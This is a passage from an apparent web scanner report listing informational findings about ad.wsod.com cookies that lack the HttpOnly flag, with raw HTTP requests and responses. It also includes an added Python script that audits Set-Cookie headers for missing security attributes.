Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 06 Sep 2011 17:05:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: c_1=74:1655:1163:221:0:51011:1315328751:B2|74:1655:1163:221:0:51011:1315328751:B2|74:1655:46:221:0:51011:1315328751:B2; expires=Fri, 07-Oct-2011 17:05:51 GMT; path=/
Location: http://www.scottrade.com?cid=AM|74|1655|1163|221&rid=B2|0&amvid=OPT_OUT&$7Dollar
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0


13.31. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1182.iframe.120x60/**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1182.iframe.120x60/**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1182.iframe.120x60/** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 06 Sep 2011 17:05:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: c_1=74:1655:1182:221:0:51011:1315328751:B2|74:1655:1182:221:0:51011:1315328750:B2|46:1542:1206:131:1736690:55175:1315313319:L; expires=Fri, 07-Oct-2011 17:05:51 GMT; path=/
Location: http://www.scottrade.com/LP/symbol/?cid=AM|74|1655|1182|221&rid=B2|0&amvid=OPT_OUT&active,smarttext,$7dollar
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0


13.32. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1205.iframe.120x60/**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1205.iframe.120x60/**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1205.iframe.120x60/** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 06 Sep 2011 17:05:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: c_1=74:1655:1205:221:0:51011:1315328751:B2|74:1655:1182:221:0:51011:1315328751:B2|74:1655:1182:221:0:51011:1315328750:B2; expires=Fri, 07-Oct-2011 17:05:51 GMT; path=/
Location: http://www.scottrade.com?cid=AM|74|1655|1205|221&rid=B2|0&amvid=OPT_OUT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0


13.33. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1206.iframe.120x60/**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1206.iframe.120x60/**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1206.iframe.120x60/** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 06 Sep 2011 17:05:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: c_1=74:1655:1206:221:0:51011:1315328751:B2|74:1655:1163:221:0:51011:1315328751:B2|74:1655:1163:221:0:51011:1315328751:B2; expires=Fri, 07-Oct-2011 17:05:51 GMT; path=/
Location: http://www.scottrade.com/online-trading.html?cid=AM|74|1655|1206|221&rid=B2|0&amvid=OPT_OUT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0


13.34. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1209.iframe.120x60/**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1209.iframe.120x60/**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1209.iframe.120x60/** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 06 Sep 2011 17:05:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: c_1=74:1655:1209:221:0:51011:1315328751:B2|74:1655:1163:221:0:51011:1315328751:B2|74:1655:1163:221:0:51011:1315328751:B2; expires=Fri, 07-Oct-2011 17:05:51 GMT; path=/
Location: http://www.scottrade.com/online-brokerage/trading-fees-commissions.html?cid=AM|74|1655|1209|221&rid=B2|0&amvid=OPT_OUT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0


13.35. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.46.iframe.120x60/**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.46.iframe.120x60/**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.46.iframe.120x60/** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 06 Sep 2011 17:05:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: c_1=74:1655:46:221:0:51011:1315328751:B2|74:1655:46:221:0:51011:1315328751:B2|74:1655:1182:221:0:51011:1315328751:B2; expires=Fri, 07-Oct-2011 17:05:51 GMT; path=/
Location: http://www.scottrade.com?cid=AM|74|1655|46|221&rid=B2|0&amvid=OPT_OUT&$7dollar
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0


13.36. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.721.iframe.120x60/**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.721.iframe.120x60/**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.721.iframe.120x60/** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 06 Sep 2011 17:05:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: c_1=74:1655:721:221:0:51011:1315328751:B2|74:1655:1206:221:0:51011:1315328751:B2|74:1655:1163:221:0:51011:1315328751:B2; expires=Fri, 07-Oct-2011 17:05:51 GMT; path=/
Location: http://www.scottrade.com?cid=AM|74|1655|721|221&rid=B2|0&amvid=OPT_OUT&fund
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0


13.37. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321534**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321534**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321534**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/4787978?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:1542:1206:131:0:55175:1315313297:L|46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:05:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1182:221:0:50987:1315321534:B2|46:1542:1206:131:0:55175:1315313297:L|46:1542:790:131:0:55175:1315313288:L; expires=Fri, 07-Oct-2011 15:05:34 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1144

   function wsod_tag() {
       document.write('<style type="text/css">\n    a#wsoB{color:black;text-decoration:none;text-shadow: 1px 1px 2px white;}\n    a#wsoB:hover{color:black;text-decoration:underline;text-sh
...[SNIP]...

13.38. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321844**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321844**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321844**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/7865964?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1182:221:0:50987:1315321534:B2|46:1542:1206:131:0:55175:1315313297:L|46:1542:790:131:0:55175:1315313288:L

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:10:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1205:221:0:50988:1315321844:B2|74:1655:1182:221:0:50987:1315321534:B2|46:1542:1206:131:0:55175:1315313297:L; expires=Fri, 07-Oct-2011 15:10:44 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 751

   function wsod_image1655() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1205.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA"
...[SNIP]...

13.39. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322154**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322154**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322154**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/5914301?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1205:221:0:50988:1315321844:B2|74:1655:1182:221:0:50987:1315321534:B2|46:1542:1206:131:0:55175:1315313297:L

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:16:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1182:221:0:50989:1315322154:B2|74:1655:1205:221:0:50988:1315321844:B2|74:1655:1182:221:0:50987:1315321534:B2; expires=Fri, 07-Oct-2011 15:15:54 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1144

   function wsod_tag() {
       document.write('<style type="text/css">\n    a#wsoB{color:black;text-decoration:none;text-shadow: 1px 1px 2px white;}\n    a#wsoB:hover{color:black;text-decoration:underline;text-sh
...[SNIP]...

13.40. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322464**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322464**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322464**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/6673089?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1182:221:0:50989:1315322154:B2|74:1655:1205:221:0:50988:1315321844:B2|74:1655:1182:221:0:50987:1315321534:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:21:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:46:221:0:50990:1315322464:B2|74:1655:1182:221:0:50989:1315322154:B2|74:1655:1205:221:0:50988:1315321844:B2; expires=Fri, 07-Oct-2011 15:21:04 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 752

   function wsod_image1655() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.46.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA" t
...[SNIP]...

13.41. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322772**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322772**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322772**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/6546395?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:46:221:0:50990:1315322464:B2|74:1655:1182:221:0:50989:1315322154:B2|74:1655:1205:221:0:50988:1315321844:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:26:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1163:221:0:50991:1315322773:B2|74:1655:46:221:0:50990:1315322464:B2|74:1655:1182:221:0:50989:1315322154:B2; expires=Fri, 07-Oct-2011 15:26:13 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 747

   function wsod_image1655() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1163.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA"
...[SNIP]...

13.42. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323080**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323080**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323080**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/7828836?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1163:221:0:50991:1315322773:B2|74:1655:46:221:0:50990:1315322464:B2|74:1655:1182:221:0:50989:1315322154:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:31:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1205:221:0:50992:1315323080:B2|74:1655:1163:221:0:50991:1315322773:B2|74:1655:46:221:0:50990:1315322464:B2; expires=Fri, 07-Oct-2011 15:31:20 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 751

   function wsod_image1655() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1205.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA"
...[SNIP]...

13.43. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323388**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323388**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323388**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/7171989?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1205:221:0:50992:1315323080:B2|74:1655:1163:221:0:50991:1315322773:B2|74:1655:46:221:0:50990:1315322464:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:36:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1206:221:0:50993:1315323388:B2|74:1655:1205:221:0:50992:1315323080:B2|74:1655:1163:221:0:50991:1315322773:B2; expires=Fri, 07-Oct-2011 15:36:28 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 752

   function wsod_image1655() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1206.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA"
...[SNIP]...
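The findings in this section all come down to one check: which attributes a Set-Cookie header carries, and whether the value it protects is worth protecting. The following script is an added example, not part of the scanner's report or of either ad server's code. It parses Set-Cookie headers the way the scanner does, reports the missing HttpOnly/Secure/SameSite attributes (SameSite is a later addition than the scanner of the day reported), and splits the ad.wsod.com i_1 value into the records visible in these captures. The two header strings are copied from the responses on this page (the ad.wsod.com i_1 cookie above, and the ad.yieldmanager.com bh cookie from finding 13.63, shortened); the "hardened" entry is a hypothetical corrected form added for contrast and was not observed on the page.

```python
"""Audit Set-Cookie headers for the attributes a scanner flags.

Added example; not from the original report. Sample headers are copied
from the responses on this page; the 'hardened' entry is hypothetical.
"""
from datetime import datetime, timezone

SAMPLES = {
    # Copied from the ad.wsod.com response above.
    "wsod": "i_1=74:1655:1206:221:0:50993:1315323388:B2|74:1655:1205:221:0:50992:1315323080:B2|74:1655:1163:221:0:50991:1315322773:B2; expires=Fri, 07-Oct-2011 15:36:28 GMT; path=/",
    # Copied from the ad.yieldmanager.com response (value truncated here).
    "yieldmanager": 'bh="b!!!#O!!-C,!!!!%=3`c_"; path=/; expires=Thu, 05-Sep-2013 15:32:13 GMT',
    # Hypothetical: the same i_1 cookie with the attributes a hardened
    # deployment would send. Not observed on the page.
    "hardened": "i_1=74:1655:1206:221:0:50993:1315323388:B2; expires=Fri, 07-Oct-2011 15:36:28 GMT; path=/; Secure; HttpOnly; SameSite=Lax",
}


def parse_set_cookie(header):
    """Split one Set-Cookie header into (name, value, attrs).

    Attribute names are lower-cased. Valueless attributes (Secure,
    HttpOnly) map to True. Splitting on ';' is safe here because the
    comma inside an Expires date is not a separator.
    """
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        key, has_value, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if has_value else True
    return name.strip(), value, attrs


def audit_set_cookie(header):
    """Return (cookie_name, findings) for one Set-Cookie header.

    Findings are the missing attributes a scanner would report, plus
    'persistent' when the cookie outlives the browser session: a readable
    persistent cookie is what lets any script on the page exfiltrate a
    tracking value long after it was set.
    """
    name, _value, attrs = parse_set_cookie(header)
    findings = []
    if "httponly" not in attrs:
        findings.append("missing HttpOnly")
    if "secure" not in attrs:
        findings.append("missing Secure")
    if "samesite" not in attrs:
        findings.append("missing SameSite")
    if "expires" in attrs or "max-age" in attrs:
        findings.append("persistent")
    return name, findings


def split_wsod_i1(value):
    """Split the ad.wsod.com i_1 value into '|'-separated records, each a
    list of ':'-separated fields.

    The field meanings are not documented on the page. What is observable
    in the iframe captures is that each response pushes one new record
    onto the front and keeps the newest three, that the sixth field
    increments by one per response (50991, 50992, 50993), and that the
    seventh field is the Unix timestamp of the response's Date header.
    """
    return [record.split(":") for record in value.split("|")]


def record_time(record):
    """UTC datetime of the timestamp field (index 6) of one i_1 record."""
    return datetime.fromtimestamp(int(record[6]), tz=timezone.utc)


if __name__ == "__main__":
    for label, header in SAMPLES.items():
        name, findings = audit_set_cookie(header)
        print(f"{label:13} {name:4} {', '.join(findings) or 'ok'}")
    newest = split_wsod_i1(parse_set_cookie(SAMPLES["wsod"])[1])[0]
    print("newest i_1 record issued at", record_time(newest).isoformat())
```

Two caveats worth keeping in mind when acting on this class of finding. First, HttpOnly only stops script on the page from reading the cookie; it does nothing about the tracking the cookie implements, which is the part the "review the contents of the cookie" advice is really about. Second, the responses here advertise PHP/5.1.6: the httponly argument to setcookie() and the session.cookie_httponly ini setting both arrived in PHP 5.2.0, so a server still on 5.1.6 has to append the attribute itself via header('Set-Cookie: ...; HttpOnly') or be upgraded before the flag can be set at all.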

13.44. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323696**

Summary
